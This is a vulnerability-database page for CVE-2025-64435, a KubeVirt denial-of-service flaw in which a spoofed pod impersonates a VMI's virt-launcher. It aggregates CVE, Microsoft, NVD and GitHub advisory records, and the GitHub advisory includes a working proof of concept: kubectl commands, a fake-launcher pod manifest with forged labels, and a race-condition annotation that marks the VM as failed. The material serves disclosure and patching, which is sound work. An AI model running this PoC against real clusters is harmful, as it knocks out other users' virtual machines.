cvelistv5 - cve-2025-64435

CVE-2025-64435 (GCVE-0-2025-64435)

Vulnerability from cvelistv5 – Published: 2025-11-07 22:57 – Updated: 2025-11-10 19:01

Summary

KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-703 - Improper Check or Handling of Exceptional Conditions

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	kubevirt	kubevirt	Affected: < 1.7.0-beta.0

MSRC_CVE-2025-64435

Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2025-11-09 01:02

Summary

KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation

Notes

Additional Resources

To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle

Disclaimer

The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

JSON

To clipboard

{
  "document": {
    "category": "csaf_vex",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Public",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
        "title": "Additional Resources"
      },
      {
        "category": "legal_disclaimer",
        "text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
        "title": "Disclaimer"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "secure@microsoft.com",
      "name": "Microsoft Security Response Center",
      "namespace": "https://msrc.microsoft.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation - VEX",
        "url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64435.json"
      },
      {
        "category": "external",
        "summary": "Microsoft Support Lifecycle",
        "url": "https://support.microsoft.com/lifecycle"
      },
      {
        "category": "external",
        "summary": "Common Vulnerability Scoring System",
        "url": "https://www.first.org/cvss"
      }
    ],
    "title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation",
    "tracking": {
      "current_release_date": "2025-11-09T01:02:03.000Z",
      "generator": {
        "date": "2025-12-03T22:59:15.054Z",
        "engine": {
          "name": "MSRC Generator",
          "version": "1.0"
        }
      },
      "id": "msrc_CVE-2025-64435",
      "initial_release_date": "2025-11-02T00:00:00.000Z",
      "revision_history": [
        {
          "date": "2025-11-09T01:02:03.000Z",
          "legacy_version": "1",
          "number": "1",
          "summary": "Information published."
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "3.0",
                "product": {
                  "name": "Azure Linux 3.0",
                  "product_id": "17084"
                }
              },
              {
                "category": "product_version",
                "name": "2.0",
                "product": {
                  "name": "CBL Mariner 2.0",
                  "product_id": "17086"
                }
              }
            ],
            "category": "product_name",
            "name": "Azure Linux"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "azl3 kubevirt 1.5.0-5",
                "product": {
                  "name": "azl3 kubevirt 1.5.0-5",
                  "product_id": "1"
                }
              },
              {
                "category": "product_version_range",
                "name": "cbl2 kubevirt 0.59.0-30",
                "product": {
                  "name": "cbl2 kubevirt 0.59.0-30",
                  "product_id": "2"
                }
              }
            ],
            "category": "product_name",
            "name": "kubevirt"
          }
        ],
        "category": "vendor",
        "name": "Microsoft"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
          "product_id": "17084-1"
        },
        "product_reference": "1",
        "relates_to_product_reference": "17084"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
          "product_id": "17086-2"
        },
        "product_reference": "2",
        "relates_to_product_reference": "17086"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-64435",
      "cwe": {
        "id": "CWE-703",
        "name": "Improper Check or Handling of Exceptional Conditions"
      },
      "notes": [
        {
          "category": "general",
          "text": "GitHub_M",
          "title": "Assigning CNA"
        }
      ],
      "product_status": {
        "known_affected": [
          "17084-1",
          "17086-2"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation - VEX",
          "url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64435.json"
        }
      ],
      "remediations": [
        {
          "category": "none_available",
          "date": "2025-11-09T01:02:03.000Z",
          "details": "There is no fix available for this vulnerability as of now",
          "product_ids": [
            "17084-1"
          ]
        },
        {
          "category": "none_available",
          "date": "2025-11-09T01:02:03.000Z",
          "details": "There is no fix available for this vulnerability as of now",
          "product_ids": [
            "17086-2"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "environmentalsScore": 0.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "temporalScore": 5.3,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "17084-1",
            "17086-2"
          ]
        }
      ],
      "title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
    }
  ]
}

FKIE_CVE-2025-64435

Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 17:15

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba	Patch
	security-advisories@github.com	https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	kubevirt	kubevirt	*
	kubevirt	kubevirt	1.7.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
              "matchCriteriaId": "5115F453-4A3D-438D-A8F3-94C5E8451F45",
              "versionEndIncluding": "1.6.3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.7.0:alpha0:*:*:*:kubernetes:*:*",
              "matchCriteriaId": "6C13B76B-290B-4D75-AF75-54FEC43B75C4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0."
    },
    {
      "lang": "es",
      "value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de la versi\u00f3n 1.7.0-beta.0, un fallo l\u00f3gico en el virt-controller permite a un atacante interrumpir el control sobre una VMI en ejecuci\u00f3n al crear un pod con las mismas etiquetas que el pod virt-launcher leg\u00edtimo asociado a la VMI. Esto puede inducir a error al virt-controller para que asocie el pod falso con la VMI, lo que resulta en actualizaciones de estado incorrectas y potencialmente causando un DoS (Denial-of-Service). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 1.7.0-beta.0."
    }
  ],
  "id": "CVE-2025-64435",
  "lastModified": "2025-11-25T17:15:44.140",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-11-07T23:15:45.850",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-703"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-9M94-W2VQ-HCF9

Vulnerability from github – Published: 2025-11-06 23:35 – Updated: 2025-11-17 21:43

Summary

KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation

Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

A logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

A vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate virt-launcher pod associated with the VMI.

The virt-launcher pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with virt-handler, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).

When virt-controller receives a notification about a change in a VMI's state, it attempts to identify the corresponding virt-launcher pod. This is necessary in several scenarios, including:

When hardware devices are requested to be hotplugged into the VMI—they must also be hotplugged into the associated virt-launcher pod.
When additional RAM is requested—this may require updating the virt-launcher pod's cgroups.
When additional CPU resources are added—this may also necessitate modifying the virt-launcher pod's cgroups.
When the VMI is scheduled to migrate to another node.

The core issue lies in the implementation of the GetControllerOf function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate virt-launcher, thereby compromising the VMI's integrity and control mechanisms.

//pkg/controller/controller.go

func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
    // Get all pods from the VMI namespace which contain the label "kubevirt.io"
    objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
    if err != nil {
        return nil, err
    }
    pods := []*k8sv1.Pod{}
    for _, obj := range objs {
        pod := obj.(*k8sv1.Pod)
        pods = append(pods, pod)
    }

    var curPod *k8sv1.Pod = nil
    for _, pod := range pods {
        if !IsControlledBy(pod, vmi) {
            continue
        }

        if vmi.Status.NodeName != "" &&
            vmi.Status.NodeName != pod.Spec.NodeName {
            // This pod isn't scheduled to the current node.
            // This can occur during the initial migration phases when
            // a new target node is being prepared for the VMI.
            continue
        }
        // take the most recently created pod
        if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
            curPod = pod
        }
    }
    return curPod, nil
}

// pkg/controller/controller_ref.go


// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
    controllerRef := metav1.GetControllerOf(pod)
    if controllerRef != nil {
        return controllerRef
    }
    // We may find pods that are only using CreatedByLabel and not set with an OwnerReference
    if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
        name := pod.Annotations[virtv1.DomainAnnotation]
        uid := types.UID(createdBy)
        vmi := virtv1.NewVMI(name, uid)
        return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
    }
    return nil
}

func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
    if controllerRef := GetControllerOf(pod); controllerRef != nil {
        return controllerRef.UID == vmi.UID
    }
    return false
}

The current logic assumes that a virt-launcher pod associated with a VMI may not always have a controllerRef. In such cases, the controller falls back to inspecting the pod's labels. Specifically it evaluates the kubevirt.io/created-by label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the virt-controller selects the most recently created one.

This logic appears to be designed with migration scenarios in mind, where it is expected that two virt-launcher pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate virt-launcher pod lacks a controllerRef and relies solely on labels (such as kubevirt.io/created-by) to indicate its association with a VMI.

This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate virt-launcher pod. As a result, the CurrentVMIPod function could mistakenly return the attacker-controlled pod instead of the authentic one.

This vulnerability has at least two serious consequences:

The attacker could disrupt or seize control over the VMI's lifecycle operations.
The attacker could potentially influence the VMI's migration target node, bypassing node-level security constraints such as nodeSelector or nodeAffinity, which are typically used to enforce workload placement policies.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Consider the following VMI definition:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-label-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml
# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11
# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}

The UID of the VMI can also be found as an argument to the container in the virt-launcher pod:

# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched
operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
  "command": [
    "/usr/bin/virt-launcher-monitor",
    ...
    "--uid",
    "18afb8bf-70c4-498b-aece-35804c9a0d11", 
    "--namespace",
    "default",
    ...

Consider the following attacker-controlled pod which is associated to the VMI using the UID defined in the kubevirt.io/created-by label:

apiVersion: v1
kind: Pod
metadata:
  name: fake-launcher
  labels:
    kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
    kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
    kubevirt.io/domain: migration
spec:
  restartPolicy: Never
  containers:
    - name: alpine
      image: alpine
      command: [ "sleep", "3600" ]

operator@minikube:~$ kubectl apply -f fake-launcher.yaml
# Get the UID of the `fake-launcher` pod
operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13

To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:

# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched
# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID

To illustrate the impact of this vulnerability, a race condition will be triggered in the sync function of the VMI controller:

// pkg/virt-controller/watch/vmi.go

func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
  //...
  if !isTempPod(pod) && controller.IsPodReady(pod) {

        // mark the pod with annotation to be evicted by this controller
        newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
        maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
    // here a new updated pod is returned
        patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
        if err != nil {
            return common.NewSyncError(err, controller.FailedPodPatchReason), pod
        }
        pod = patchedPod
    // ...

func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
    patchSet := patch.New()
    for key, newValue := range newAnnotations {
        if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
            patchSet.AddOption(
                patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
            )
        }
    }
    if patchSet.IsEmpty() {
        return pod, nil
    }

    patchBytes, err := patchSet.GeneratePayload()
    // ...
    patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
  // ...
    return patchedPod, nil
}

The above code adds additional annotations to the virt-launcher pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow. There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:

// pkg/virt-controller/watch/vmi.go

func isTempPod(pod *k8sv1.Pod) bool {
  // EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
    _, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
    return ok
}

// pkg/virt-controller/watch/vmi.go

func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
  // ...
  vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
    tempPodExists := controller.PodExists(pod) && isTempPod(pod)

  //...
  case vmi.IsRunning():
        if !vmiPodExists {
      // MK: this will toggle the VMI phase to Failed
            vmiCopy.Status.Phase = virtv1.Failed
            break
        }
    //...

  vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
    if vmiChanged {
    // MK: this will detect that the phase of the VMI has changed and updated the resource
        key := controller.VirtualMachineInstanceKey(vmi)
        c.vmiExpectations.SetExpectations(key, 1, 0)
        _, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
        if err != nil {
            c.vmiExpectations.LowerExpectations(key, 1, 0)
            return err
        }
    }

To trigger it, the attacker should update the fake-launcher pod's annotations before the check vmiPodExists := controller.PodExists(pod) && !isTempPod(pod) in sync, and between the check if !isTempPod(pod) && controller.IsPodReady(pod) in sync but before the patch API call in syncPodAnnotations as follows:

annotations:
    kubevirt.io/ephemeral-provisioning: "true"

The above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).

The update should also happen during the reconciliation loop when the fake-launcher pod is initially going to be associated with the VMI and its labels, related to eviction, updated.

Upon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:

operator@minikube:~$ kubectl get vmi
NAME                       AGE    PHASE    IP            NODENAME   READY
launcher-label-confusion   128m   Failed   10.244.0.10   minikube   False
# The VMI is not reachable anymore 
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status

# The two pods are still associated with the VMI

operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}' 
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}

Impact

As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "kubevirt.io/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.0-beta.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64435"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-703"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-06T23:35:24Z",
    "nvd_published_at": "2025-11-07T23:15:45Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nA logic flaw in the `virt-controller` allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate `virt-launcher` pod associated with the VMI. This can mislead the `virt-controller` into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nA vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate `virt-launcher` pod associated with the VMI.\n\nThe `virt-launcher` pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with `virt-handler`, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).\n\nWhen `virt-controller` receives a notification about a change in a VMI\u0027s state, it attempts to identify the corresponding `virt-launcher` pod. This is necessary in several scenarios, including:\n\n- When hardware devices are requested to be hotplugged into the VMI\u2014they must also be hotplugged into the associated `virt-launcher` pod.\n- When additional RAM is requested\u2014this may require updating the `virt-launcher` pod\u0027s cgroups.\n- When additional CPU resources are added\u2014this may also necessitate modifying the `virt-launcher` pod\u0027s cgroups.\n- When the VMI is scheduled to migrate to another node.\n\nThe core issue lies in the implementation of the `GetControllerOf` function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate `virt-launcher`, thereby compromising the VMI\u0027s integrity and control mechanisms.\n\n```go\n//pkg/controller/controller.go\n\nfunc CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {\n\t// Get all pods from the VMI namespace which contain the label \"kubevirt.io\"\n\tobjs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tpods := []*k8sv1.Pod{}\n\tfor _, obj := range objs {\n\t\tpod := obj.(*k8sv1.Pod)\n\t\tpods = append(pods, pod)\n\t}\n\n\tvar curPod *k8sv1.Pod = nil\n\tfor _, pod := range pods {\n\t\tif !IsControlledBy(pod, vmi) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif vmi.Status.NodeName != \"\" \u0026\u0026\n\t\t\tvmi.Status.NodeName != pod.Spec.NodeName {\n\t\t\t// This pod isn\u0027t scheduled to the current node.\n\t\t\t// This can occur during the initial migration phases when\n\t\t\t// a new target node is being prepared for the VMI.\n\t\t\tcontinue\n\t\t}\n\t\t// take the most recently created pod\n\t\tif curPod == nil || curPod.CreationTimestamp.Before(\u0026pod.CreationTimestamp) {\n\t\t\tcurPod = pod\n\t\t}\n\t}\n\treturn curPod, nil\n}\n```\n\n```go\n// pkg/controller/controller_ref.go\n\n\n// GetControllerOf returns the controllerRef if controllee has a controller,\n// otherwise returns nil.\nfunc GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {\n\tcontrollerRef := metav1.GetControllerOf(pod)\n\tif controllerRef != nil {\n\t\treturn controllerRef\n\t}\n\t// We may find pods that are only using CreatedByLabel and not set with an OwnerReference\n\tif createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) \u003e 0 {\n\t\tname := pod.Annotations[virtv1.DomainAnnotation]\n\t\tuid := types.UID(createdBy)\n\t\tvmi := virtv1.NewVMI(name, uid)\n\t\treturn metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)\n\t}\n\treturn nil\n}\n\nfunc IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {\n\tif controllerRef := GetControllerOf(pod); controllerRef != nil {\n\t\treturn controllerRef.UID == vmi.UID\n\t}\n\treturn false\n}\n```\n\nThe current logic assumes that a `virt-launcher` pod associated with a VMI may not always have a `controllerRef`. In such cases, the controller falls back to inspecting the pod\u0027s labels. Specifically it evaluates the `kubevirt.io/created-by` label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the `virt-controller` selects the most recently created one.\n\nThis logic appears to be designed with migration scenarios in mind, where it is expected that two `virt-launcher` pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate `virt-launcher` pod lacks a `controllerRef` and relies solely on labels (such as `kubevirt.io/created-by`) to indicate its association with a VMI.\n\nThis fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate `virt-launcher` pod. As a result, the `CurrentVMIPod` function could mistakenly return the attacker-controlled pod instead of the authentic one.\n\nThis vulnerability has at least two serious consequences:\n\n- The attacker could disrupt or seize control over the VMI\u0027s lifecycle operations.\n- The attacker could potentially influence the VMI\u0027s migration target node, bypassing node-level security constraints such as `nodeSelector` or `nodeAffinity`, which are typically used to enforce workload placement policies.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nConsider the following VMI definition:\n\n```yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n  name: launcher-label-confusion\nspec:\n  domain:\n    devices:\n      disks:\n      - name: containerdisk\n        disk:\n          bus: virtio\n      - name: cloudinitdisk\n        disk:\n          bus: virtio\n    resources:\n      requests:\n        memory: 1024M\n  terminationGracePeriodSeconds: 0\n  volumes:\n  - name: containerdisk\n    containerDisk:\n      image: quay.io/kubevirt/cirros-container-disk-demo\n  - name: cloudinitdisk      \n    cloudInitNoCloud:\n      userDataBase64: SGkuXG4=\n```\n\n\n```bash\n# Deploy the launcher-label-confusion VMI\noperator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml\n# Get the UID of the VMI\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.metadata.uid}\u0027\n18afb8bf-70c4-498b-aece-35804c9a0d11\n# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027\n{\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\"}\n```\n\nThe UID of the VMI can also be found as an argument to the container in the `virt-launcher` pod:\n\n```bash\n# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched\noperator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath=\u0027{.spec.containers[0]}\u0027 | jq .\n{\n  \"command\": [\n    \"/usr/bin/virt-launcher-monitor\",\n    ...\n    \"--uid\",\n    \"18afb8bf-70c4-498b-aece-35804c9a0d11\", \n    \"--namespace\",\n    \"default\",\n    ...\n```\n\nConsider the following attacker-controlled pod which is associated to the VMI using the UID defined in the 